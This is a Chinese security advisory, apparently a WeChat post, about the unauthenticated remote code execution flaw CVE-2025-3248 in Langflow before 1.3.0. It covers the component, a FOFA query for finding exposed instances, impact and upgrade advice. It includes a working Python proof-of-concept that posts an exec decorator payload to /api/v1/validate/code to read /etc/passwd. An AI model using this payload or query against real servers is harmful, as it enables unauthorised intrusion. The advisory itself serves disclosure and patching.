↑点击关注,获取更多漏洞预警,技术分享
0x01 组件介绍
LangFlow 是一款低代码、可视化的 AI 应用构建工具,专为快速搭建和实验 LangChain 流水线而设计。通过拖拽式界面,用户可以轻松创建复杂的 AI 工作流,无需编写大量代码。它支持多代理对话管理和 RAG(检索增强生成)应用,适用于构建智能聊天机器人、文档分析系统和内容生成工具等场景
fofa语法:title=="Langflow"
0x02 漏洞描述近日,互联网上披露CVE-2025-3248 Langflow code 代码执行漏洞,攻击者可在无需登陆的情况下执行代码,通过调用装饰器进行远程代码执行,控制服务器。
|
|
|
||
|
|
|
|
|
|
|
|
|
|
Langflow <1.3.0
0x04 漏洞验证
目前POC/EXP已经公开(后台留言:CVE-2025-3248,获取测试POC)
概念性验证:
发送数据包,出现下面的即可证明漏洞存在
执行命令,查看/etc/passwd文件
check_url1 = self.url + "/api/v1/validate/code"
req_json = { "code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"cat\", \"/etc/passwd\"]))')\ndef foo():\n pass"}
response = requests.post(check_url1, verify=False, headers=headers, json=req_json)
0x05 漏洞影响
由于该漏洞影响范围较广,危害较大。通过以上复现过程,我们可以知道该漏洞的利用过程比较简单,且能造成的危害是严重的,可以执行任意命令,反弹shell,读取配置文件。企业应该尽快排查是否有使用该组件,并尽快做出对应措施
0x06 修复建议
官方已发布安全更新,建议升级至最新版本。
https://github.com/langflow-ai/langflow/releases/tag/1.3.0
0X07 参考链接
https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/
原文始发于微信公众号(安全探索者):【已复现】Langflow code 代码执行漏洞(CVE-2025-3248)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论